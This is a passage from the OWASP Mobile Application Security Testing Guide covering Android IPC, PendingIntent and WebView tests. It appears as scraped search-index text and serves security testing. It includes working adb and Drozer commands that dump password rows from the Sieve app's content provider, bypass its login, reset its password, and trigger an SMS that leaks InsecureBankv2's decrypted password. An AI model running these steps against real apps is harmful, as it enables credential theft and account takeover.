For more information about the content providers, please refer to the test case \"Testing Whether Stored Sensitive Data Is Exposed via IPC Mechanisms\" in chapter \"Testing Data Storage\".
Once you identify a list of IPC mechanisms, review the source code to see whether sensitive data is leaked when the mechanisms are used. For example, content providers can be used to access database information, and services can be probed to see if they return data. Broadcast receivers can leak sensitive information if probed or sniffed.
In the following, we use two example apps and give examples of identifying vulnerable IPC components:
In the \"Sieve\" app, we find three exported activities, identified by <activity>
:
<activity android:excludeFromRecents=\"true\" android:label=\"@string/app_name\" android:launchMode=\"singleTask\" android:name=\".MainLoginActivity\" android:windowSoftInputMode=\"adjustResize|stateVisible\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_file_select\" android:name=\".FileSelectActivity\" />\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_pwlist\" android:name=\".PWList\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code","title":"Inspect the Source Code","text":"By inspecting the PWList.java
activity, we see that it offers options to list all keys, add, delete, etc. If we invoke it directly, we will be able to bypass the LoginActivity. More on this can be found in the dynamic analysis below.
In the \"Sieve\" app, we find two exported services, identified by <service>
:
<service android:exported=\"true\" android:name=\".AuthService\" android:process=\":remote\" />\n<service android:exported=\"true\" android:name=\".CryptoService\" android:process=\":remote\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_1","title":"Inspect the Source Code","text":"Check the source code for the class android.app.Service
:
By reversing the target application, we can see that the service AuthService
provides functionality for changing the password and PIN-protecting the target app.
public void handleMessage(Message msg) {\n AuthService.this.responseHandler = msg.replyTo;\n Bundle returnBundle = msg.obj;\n int responseCode;\n int returnVal;\n switch (msg.what) {\n ...\n case AuthService.MSG_SET /*6345*/:\n if (msg.arg1 == AuthService.TYPE_KEY) /*7452*/ {\n responseCode = 42;\n if (AuthService.this.setKey(returnBundle.getString(\"com.mwr.example.sieve.PASSWORD\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else if (msg.arg1 == AuthService.TYPE_PIN) {\n responseCode = 41;\n if (AuthService.this.setPin(returnBundle.getString(\"com.mwr.example.sieve.PIN\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else {\n sendUnrecognisedMessage();\n return;\n }\n }\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers","title":"Broadcast Receivers","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-androidmanifest_2","title":"Inspect the AndroidManifest","text":"In the \"Android Insecure Bank\" app, we find a broadcast receiver in the manifest, identified by <receiver>
:
<receiver android:exported=\"true\" android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\">\n <intent-filter>\n <action android:name=\"theBroadcast\" />\n </intent-filter>\n</receiver>\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_2","title":"Inspect the Source Code","text":"Search the source code for strings like sendBroadcast
, sendOrderedBroadcast
, and sendStickyBroadcast
. Make sure that the application doesn't send any sensitive data.
If an Intent is broadcasted and received within the application only, LocalBroadcastManager
can be used to prevent other apps from receiving the broadcast message. This reduces the risk of leaking sensitive information.
To understand more about what the receiver is intended to do, we have to go deeper in our static analysis and search for usage of the class android.content.BroadcastReceiver
and the Context.registerReceiver
method, which is used to dynamically create receivers.
The following extract of the target application's source code shows that the broadcast receiver triggers transmission of an SMS message containing the user's decrypted password.
public class MyBroadCastReceiver extends BroadcastReceiver {\n String usernameBase64ByteString;\n public static final String MYPREFS = \"mySharedPreferences\";\n\n @Override\n public void onReceive(Context context, Intent intent) {\n // TODO Auto-generated method stub\n\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(MYPREFS, Context.MODE_WORLD_READABLE);\n final String username = settings.getString(\"EncryptedUsername\", null);\n byte[] usernameBase64Byte = Base64.decode(username, Base64.DEFAULT);\n usernameBase64ByteString = new String(usernameBase64Byte, \"UTF-8\");\n final String password = settings.getString(\"superSecurePassword\", null);\n CryptoClass crypt = new CryptoClass();\n String decryptedPassword = crypt.aesDeccryptedString(password);\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \"+decryptedPassword+\" to: \"+newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \"+textPhoneno+\" password is: \"+textMessage);\nsmsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);\n }\n }\n }\n}\n
BroadcastReceivers should use the android:permission
attribute; otherwise, other applications can invoke them. You can use Context.sendBroadcast(intent, receiverPermission);
to specify permissions a receiver must have to read the broadcast. You can also set an explicit application package name that limits the components this Intent will resolve to. If left as the default value (null), all components in all applications will be considered. If non-null, the Intent can match only the components in the given application package.
You can enumerate IPC components with MobSF. To list all exported IPC components, upload the APK file and the components collection will be displayed in the following screen:
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#content-providers","title":"Content Providers","text":"The \"Sieve\" application implements a vulnerable content provider. To list the content providers exported by the Sieve app, execute the following command:
$ adb shell dumpsys package com.mwr.example.sieve | grep -Po \"Provider{[\\w\\d\\s\\./]+}\" | sort -u\nProvider{34a20d5 com.mwr.example.sieve/.FileBackupProvider}\nProvider{64f10ea com.mwr.example.sieve/.DBContentProvider}\n
Once identified, you can use jadx to reverse engineer the app and analyze the source code of the exported content providers to identify potential vulnerabilities.
To identify the corresponding class of a content provider, use the following information:
com.mwr.example.sieve
.DBContentProvider
.When analyzing the class com.mwr.example.sieve.DBContentProvider
, you'll see that it contains several URIs:
package com.mwr.example.sieve;\n...\npublic class DBContentProvider extends ContentProvider {\n public static final Uri KEYS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Keys\");\n public static final Uri PASSWORDS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Passwords\");\n...\n}\n
Use the following commands to call the content provider using the identified URIs:
$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/\nRow: 0 Password=1234567890AZERTYUIOPazertyuiop, pin=1234\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/\nRow: 0 _id=1, service=test, username=test, password=BLOB, email=t@tedt.com\nRow: 1 _id=2, service=bank, username=owasp, password=BLOB, email=user@tedt.com\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection email:username:password --where 'service=\\\"bank\\\"'\nRow: 0 email=user@tedt.com, username=owasp, password=BLOB\n
You are able now to retrieve all database entries (see all lines starting with \"Row:\" in the output).
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#activities_1","title":"Activities","text":"To list activities exported by an application, you can use the following command and focus on activity
elements:
$ aapt d xmltree sieve.apk AndroidManifest.xml\n...\nE: activity (line=32)\n A: android:label(0x01010001)=@0x7f05000f\n A: android:name(0x01010003)=\".FileSelectActivity\" (Raw: \".FileSelectActivity\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=40)\n A: android:label(0x01010001)=@0x7f050000\n A: android:name(0x01010003)=\".MainLoginActivity\" (Raw: \".MainLoginActivity\")\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n A: android:launchMode(0x0101001d)=(type 0x10)0x2\n A: android:windowSoftInputMode(0x0101022b)=(type 0x11)0x14\n E: intent-filter (line=46)\n E: action (line=47)\n A: android:name(0x01010003)=\"android.intent.action.MAIN\" (Raw: \"android.intent.action.MAIN\")\n E: category (line=49)\n A: android:name(0x01010003)=\"android.intent.category.LAUNCHER\" (Raw: \"android.intent.category.LAUNCHER\")\nE: activity (line=52)\n A: android:label(0x01010001)=@0x7f050009\n A: android:name(0x01010003)=\".PWList\" (Raw: \".PWList\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=60)\n A: android:label(0x01010001)=@0x7f05000a\n A: android:name(0x01010003)=\".SettingsActivity\" (Raw: \".SettingsActivity\")\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n...\n
You can identify an exported activity using one of the following properties:
intent-filter
sub declaration.android:exported
to 0xffffffff
.You can also use jadx to identify exported activities in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.mwr.example.sieve\">\n...\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".FileSelectActivity\" android:exported=\"true\" />\n <!-- This activity is exported via the \"intent-filter\" declaration -->\n <activity android:name=\".MainLoginActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\"/>\n <category android:name=\"android.intent.category.LAUNCHER\"/>\n </intent-filter>\n </activity>\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".PWList\" android:exported=\"true\" />\n <!-- Activities below are not exported -->\n <activity android:name=\".SettingsActivity\" />\n <activity android:name=\".AddEntryActivity\"/>\n <activity android:name=\".ShortLoginActivity\" />\n <activity android:name=\".WelcomeActivity\" />\n <activity android:name=\".PINActivity\" />\n...\n</manifest>\n
Enumerating activities in the vulnerable password manager \"Sieve\" shows that the following activities are exported:
.MainLoginActivity
.PWList
.FileSelectActivity
Use the command below to launch an activity:
# Start the activity without specifying an action or an category\n$ adb shell am start -n com.mwr.example.sieve/.PWList\nStarting: Intent { cmp=com.mwr.example.sieve/.PWList }\n\n# Start the activity indicating an action (-a) and an category (-c)\n$ adb shell am start -n \"com.mwr.example.sieve/.MainLoginActivity\" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER\nStarting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.mwr.example.sieve/.MainLoginActivity }\n
Since the activity .PWList
is called directly in this example, you can use it to bypass the login form protecting the password manager, and access the data contained within the password manager.
Services can be enumerated with the Drozer module app.service.info
:
dz> run app.service.info -a com.mwr.example.sieve\nPackage: com.mwr.example.sieve\n com.mwr.example.sieve.AuthService\n Permission: null\n com.mwr.example.sieve.CryptoService\n Permission: null\n
To communicate with a service, you must first use static analysis to identify the required inputs.
Because this service is exported, you can use the module app.service.send
to communicate with the service and change the password stored in the target application:
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD \"abcdabcdabcdabcd\" --bundle-as-obj\nGot a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService:\n what: 4\n arg1: 42\n arg2: 0\n Empty\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers_1","title":"Broadcast Receivers","text":"To list broadcast receivers exported by an application, you can use the following command and focus on receiver
elements:
$ aapt d xmltree InsecureBankv2.apk AndroidManifest.xml\n...\nE: receiver (line=88)\n A: android:name(0x01010003)=\"com.android.insecurebankv2.MyBroadCastReceiver\" (Raw: \"com.android.insecurebankv2.MyBroadCastReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n E: intent-filter (line=91)\n E: action (line=92)\n A: android:name(0x01010003)=\"theBroadcast\" (Raw: \"theBroadcast\")\nE: receiver (line=119)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" (Raw: \"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0x0\n E: intent-filter (line=122)\n E: action (line=123)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\" (Raw: \"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\")\n...\n
You can identify an exported broadcast receiver using one of the following properties:
intent-filter
sub declaration.android:exported
set to 0xffffffff
.You can also use jadx to identify exported broadcast receivers in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.android.insecurebankv2\">\n...\n <!-- This broadcast receiver is exported via the attribute \"exported\" as well as the \"intent-filter\" declaration -->\n <receiver android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"theBroadcast\"/>\n </intent-filter>\n </receiver>\n <!-- This broadcast receiver is NOT exported because the attribute \"exported\" is explicitly set to false -->\n <receiver android:name=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" android:exported=\"false\">\n <intent-filter>\n <action android:name=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\"/>\n </intent-filter>\n </receiver>\n...\n</manifest>\n
The above example from the vulnerable banking application InsecureBankv2 shows that only the broadcast receiver named com.android.insecurebankv2.MyBroadCastReceiver
is exported.
Now that you know that there is an exported broadcast receiver, you can dive deeper and reverse engineer the app using jadx. This will allow you to analyze the source code searching for potential vulnerabilities that you could later try to exploit. The source code of the exported broadcast receiver is the following:
package com.android.insecurebankv2;\n...\npublic class MyBroadCastReceiver extends BroadcastReceiver {\n public static final String MYPREFS = \"mySharedPreferences\";\n String usernameBase64ByteString;\n\n public void onReceive(Context context, Intent intent) {\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(\"mySharedPreferences\", 1);\n this.usernameBase64ByteString = new String(Base64.decode(settings.getString(\"EncryptedUsername\", (String) null), 0), \"UTF-8\");\n String decryptedPassword = new CryptoClass().aesDeccryptedString(settings.getString(\"superSecurePassword\", (String) null));\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \" + decryptedPassword + \" to: \" + newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \" + textPhoneno + \" password is: \" + textMessage);\n smsManager.sendTextMessage(textPhoneno, (String) null, textMessage, (PendingIntent) null, (PendingIntent) null);\n } catch (Exception e) {\n e.printStackTrace();\n }\n } else {\n System.out.println(\"Phone number is null\");\n }\n }\n}\n
As you can see in the source code, this broadcast receiver expects two parameters named phonenumber
and newpass
. With this information you can now try to exploit this broadcast receiver by sending events to it using custom values:
# Send an event with the following properties:\n# Action is set to \"theBroadcast\"\n# Parameter \"phonenumber\" is set to the string \"07123456789\"\n# Parameter \"newpass\" is set to the string \"12345\"\n$ adb shell am broadcast -a theBroadcast --es phonenumber \"07123456789\" --es newpass \"12345\"\nBroadcasting: Intent { act=theBroadcast flg=0x400000 (has extras) }\nBroadcast completed: result=0\n
This generates the following SMS:
Updated Password from: SecretPassword@ to: 12345\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#sniffing-intents","title":"Sniffing Intents","text":"If an Android application broadcasts intents without setting a required permission or specifying the destination package, the intents can be monitored by any application that runs on the device.
To register a broadcast receiver to sniff intents, use the Drozer module app.broadcast.sniff
and specify the action to monitor with the --action
parameter:
dz> run app.broadcast.sniff --action theBroadcast\n[*] Broadcast receiver registered to sniff matching intents\n[*] Output is updated once a second. Press Control+C to exit.\n\nAction: theBroadcast\nRaw: Intent { act=theBroadcast flg=0x10 (has extras) }\nExtra: phonenumber=07123456789 (java.lang.String)\nExtra: newpass=12345 (java.lang.String)`\n
You can also use the following command to sniff the intents. However, the content of the extras passed will not be displayed:
$ adb shell dumpsys activity broadcasts | grep \"theBroadcast\"\nBroadcastRecord{fc2f46f u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\nBroadcastRecord{7d4f24d u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\n45: act=theBroadcast flg=0x400010 (has extras)\n46: act=theBroadcast flg=0x400010 (has extras)\n121: act=theBroadcast flg=0x400010 (has extras)\n144: act=theBroadcast flg=0x400010 (has extras)\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/","title":"Testing for Vulnerable Implementation of PendingIntent","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#overview","title":"Overview","text":"When testing Pending Intents you must ensure that they are immutable and that the app explicitly specifies the exact package, action, and component that will receive the base intent.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#static-analysis","title":"Static Analysis","text":"To identify vulnerable implementations, static analysis can be performed by looking for API calls used for obtaining a PendingIntent
. Such APIs are listed below:
PendingIntent getActivity(Context, int, Intent, int)\nPendingIntent getActivity(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int)\nPendingIntent getForegroundService(Context, int, Intent, int)\nPendingIntent getService(Context, int, Intent, int)\n
Once any of the above function is spotted, check the implementation of the base intent and the PendingIntent
for the security pitfalls listed in the Pending Intents section.
For example, in A-156959408(CVE-2020-0389), the base intent is implicit and also the PendingIntent
is mutable, thus making it exploitable.
private Notification createSaveNotification(Uri uri) {\n Intent viewIntent = new Intent(Intent.ACTION_VIEW)\n .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_GRANT_READ_URI_PERMISSION)\n .setDataAndType(uri, \"video/mp4\"); //Implicit Intent\n\n//... skip ...\n\n\nNotification.Builder builder = new Notification.Builder(this, CHANNEL_ID)\n .setSmallIcon(R.drawable.ic_android)\n .setContentTitle(getResources().getString(R.string.screenrecord_name))\n .setContentText(getResources().getString(R.string.screenrecord_save_message))\n .setContentIntent(PendingIntent.getActivity(\n this,\n REQUEST_CODE,\n viewIntent,\n Intent.FLAG_GRANT_READ_URI_PERMISSION)) // Mutable PendingIntent.\n .addAction(shareAction)\n .addAction(deleteAction)\n .setAutoCancel(true);\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#dynamic-analysis","title":"Dynamic Analysis","text":"Frida can be used to hook the APIs used to get a PendingIntent
. This information can be used to determine the code location of the call, which can be further used to perform static analysis as described above.
Here's an example of such a Frida script that can be used to hook the PendingIntent.getActivity
function:
var pendingIntent = Java.use('android.app.PendingIntent');\n\nvar getActivity_1 = pendingIntent.getActivity.overload(\"android.content.Context\", \"int\", \"android.content.Intent\", \"int\");\n\ngetActivity_1.implementation = function(context, requestCode, intent, flags){\n console.log(\"[*] Calling PendingIntent.getActivity(\"+intent.getAction()+\")\");\n console.log(\"\\t[-] Base Intent toString: \" + intent.toString());\n console.log(\"\\t[-] Base Intent getExtras: \" + intent.getExtras());\n console.log(\"\\t[-] Base Intent getFlags: \" + intent.getFlags());\n return this.getActivity(context, requestCode, intent, flags);\n}\n
This approach can be helpful when dealing with applications with large code bases, where determining the control flow can sometimes be tricky.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/","title":"Testing JavaScript Execution in WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#overview","title":"Overview","text":"To test for JavaScript execution in WebViews check the app for WebView usage and evaluate whether or not each WebView should allow JavaScript execution. If JavaScript execution is required for the app to function normally, then you need to ensure that the app follows the all best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis","title":"Static Analysis","text":"To create and use a WebView, an app must create an instance of the WebView
class.
WebView webview = new WebView(this);\nsetContentView(webview);\nwebview.loadUrl(\"https://www.owasp.org/\");\n
Various settings can be applied to the WebView (activating/deactivating JavaScript is one example). JavaScript is disabled by default for WebViews and must be explicitly enabled. Look for the method setJavaScriptEnabled
to check for JavaScript activation.
webview.getSettings().setJavaScriptEnabled(true);\n
This allows the WebView to interpret JavaScript. It should be enabled only if necessary to reduce the attack surface to the app. If JavaScript is necessary, you should make sure that
To remove all JavaScript source code and locally stored data, clear the WebView's cache with clearCache
when the app closes.
Devices running platforms older than Android 4.4 (API level 19) use a version of WebKit that has several security issues. As a workaround, the app must confirm that WebView objects display only trusted content if the app runs on these devices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic Analysis depends on operating conditions. There are several ways to inject JavaScript into an app's WebView:
To address these attack vectors, check the following:
Only files that are in the app data directory should be rendered in a WebView (see test case \"Testing for Local File Inclusion in WebViews\").
The HTTPS communication must be implemented according to best practices to avoid MITM attacks. This means:
To test for WebView protocol handlers check the app for WebView usage and evaluate whether or not the WebView should have resource access. If resource access is necessary you need to verify that it's implemented following best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0032/#static-analysis","title":"Static Analysis","text":"Check the source code for WebView usage. The following WebView settings control resource access:
setAllowContentAccess
: Content URL access allows WebViews to load content from a content provider installed on the system, which is enabled by default .setAllowFileAccess
: Enables and disables file access within a WebView. The default value is true
when targeting Android 10 (API level 29) and below and false
for Android 11 (API level 30) and above. Note that this enables and disables file system access only. Asset and resource access is unaffected and accessible via file:///android_asset
and file:///android_res
.setAllowFileAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from other file scheme URLs. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.setAllowUniversalAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from any origin. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.If one or more of the above methods is/are activated, you should determine whether the method(s) is/are really necessary for the app to work properly.
If a WebView instance can be identified, find out whether local files are loaded with the loadURL
method.
WebView = new WebView(this);\nwebView.loadUrl(\"file:///android_asset/filename.html\");\n
The location from which the HTML file is loaded must be verified. If the file is loaded from external storage, for example, the file is readable and writable by everyone. This is considered a bad practice. Instead, the file should be placed in the app's assets directory.
webview.loadUrl(\"file:///\" +\nEnvironment.getExternalStorageDirectory().getPath() +\n\"filename.html\");\n
The URL specified in loadURL
should be checked for dynamic parameters that can be manipulated; their manipulation may lead to local file inclusion.
Use the following code snippet and best practices to deactivate protocol handlers, if applicable:
//If attackers can inject script into a WebView, they could access local resources. This can be prevented by disabling local file system access, which is enabled by default. You can use the Android WebSettings class to disable local file system access via the public method `setAllowFileAccess`.\nwebView.getSettings().setAllowFileAccess(false);\n\nwebView.getSettings().setAllowFileAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowUniversalAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowContentAccess(false);\n
To identify the usage of protocol handlers, look for ways to trigger phone calls and ways to access files from the file system while you're using the app.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/","title":"Testing for Java Objects Exposed Through WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#overview","title":"Overview","text":"To test for Java objects exposed through WebViews check the app for WebViews having JavaScript enabled and determine whether the WebView is creating any JavaScript interfaces aka. \"JavaScript Bridges\". Finally, check whether an attacker could potentially inject malicious JavaScript code.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#static-analysis","title":"Static Analysis","text":"The following example shows how addJavascriptInterface
is used to bridge a Java Object and JavaScript in a WebView:
WebView webview = new WebView(this);\nWebSettings webSettings = webview.getSettings();\nwebSettings.setJavaScriptEnabled(true);\n\nMSTG_ENV_008_JS_Interface jsInterface = new MSTG_ENV_008_JS_Interface(this);\n\nmyWebView.addJavascriptInterface(jsInterface, \"Android\");\nmyWebView.loadURL(\"http://example.com/file.html\");\nsetContentView(myWebView);\n
In Android 4.2 (API level 17) and above, an annotation @JavascriptInterface
explicitly allows JavaScript to access a Java method.
public class MSTG_ENV_008_JS_Interface {\n\n Context mContext;\n\n /** Instantiate the interface and set the context */\n MSTG_ENV_005_JS_Interface(Context c) {\n mContext = c;\n }\n\n @JavascriptInterface\n public String returnString () {\n return \"Secret String\";\n }\n\n /** Show a toast from the web page */\n @JavascriptInterface\n public void showToast(String toast) {\n Toast.makeText(mContext, toast, Toast.LENGTH_SHORT).show();\n }\n}\n
This is how you can call the method returnString
from JavaScript, the string \"Secret String\" will be stored in the variable result
:
var result = window.Android.returnString();\n
With access to the JavaScript code, via, for example, stored XSS or a MITM attack, an attacker can directly call the exposed Java methods.
If addJavascriptInterface
is necessary, take the following considerations:
WebView.getUrl
).<uses-sdk android:minSdkVersion=\"17\" />
).Dynamic analysis of the app can show you which HTML or JavaScript files are loaded and which vulnerabilities are present. The procedure for exploiting the vulnerability starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via a MITM attack or direct modification of the file if it is stored in external storage. The whole process can be accomplished via Drozer and weasel (MWR's advanced exploitation payload), which can install a full agent, injecting a limited agent into a running process or connecting a reverse shell as a Remote Access Tool (RAT).
A full description of the attack is included in the blog article \"WebView addJavascriptInterface Remote Code Execution\".
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/","title":"Testing for Overlay Attacks","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#overview","title":"Overview","text":"To test for overlay attacks you need to check the app for usage of certain APIs and attributed typically used to protect against overlay attacks as well as check the Android version that app is targeting.
To mitigate these attacks please carefully read the general guidelines about Android View security in the Android Developer Documentation. For instance, the so-called touch filtering is a common defense against tapjacking, which contributes to safeguarding users against these vulnerabilities, usually in combination with other techniques and considerations as we introduce in this section.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#static-analysis","title":"Static Analysis","text":"To start your static analysis you can check the app for the following methods and attributes (non-exhaustive list):
onFilterTouchEventForSecurity
for more fine-grained control and to implement a custom security policy for views.android:filterTouchesWhenObscured
to true or call setFilterTouchesWhenObscured
.Some attributes might affect the app as a whole, while others can be applied to specific components. The latter would be the case when, for example, there is a business need to specifically allow overlays while wanting to protect sensitive input UI elements. The developers might also take additional precautions to confirm the user's actual intent which might be legitimate and tell it apart from a potential attack.
As a final note, always remember to properly check the API level that app is targeting and the implications that this has. For instance, Android 8.0 (API level 26) introduced changes to apps requiring SYSTEM_ALERT_WINDOW
(\"draw on top\"). From this API level on, apps using TYPE_APPLICATION_OVERLAY
will be always shown above other windows having other types such as TYPE_SYSTEM_OVERLAY
or TYPE_SYSTEM_ALERT
. You can use this information to ensure that no overlay attacks may occur at least for this app in this concrete Android version.
Abusing this kind of vulnerability on a dynamic manner can be pretty challenging and very specialized as it closely depends on the target Android version. For instance, for versions up to Android 7.0 (API level 24) you can use the following APKs as a proof of concept to identify the existence of the vulnerabilities.
To test for WebViews cleanup you should inspect all APIs related to WebView data deletion and try to fully track the data deletion process.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#static-analysis","title":"Static Analysis","text":"Start by identifying the usage of the following WebView APIs and carefully validate the mentioned best practices.
Initialization: an app might be initializing the WebView in a way to avoid storing certain information by using setDomStorageEnabled
, setAppCacheEnabled
or setDatabaseEnabled
from android.webkit.WebSettings
. The DOM Storage (for using the HTML5 local storage), Application Caches and Database Storage APIs are disabled by default, but apps might set these settings explicitly to \"true\".
Cache: Android's WebView class offers the clearCache
method which can be used to clear the cache for all WebViews used by the app. It receives a boolean input parameter (includeDiskFiles
) which will wipe all stored resource including the RAM cache. However if it's set to false, it will only clear the RAM cache. Check the app for usage of the clearCache
method and verify its input parameter. Additionally, you may also check if the app is overriding onRenderProcessUnresponsive
for the case when the WebView might become unresponsive, as the clearCache
method might also be called from there.
WebStorage APIs: WebStorage.deleteAllData
can be also used to clear all storage currently being used by the JavaScript storage APIs, including the Web SQL Database and the HTML5 Web Storage APIs.
Some apps will need to enable the DOM storage in order to display some HTML5 sites that use local storage. This should be carefully investigated as this might contain sensitive data.
Cookies: any existing cookies can be deleted by using CookieManager.removeAllCookies.
File APIs: proper data deletion in certain directories might not be that straightforward, some apps use a pragmatic solution which is to manually delete selected directories known to hold user data. This can be done using the java.io.File
API such as java.io.File.deleteRecursively
.
Example:
This example in Kotlin from the open source Firefox Focus app shows different cleanup steps:
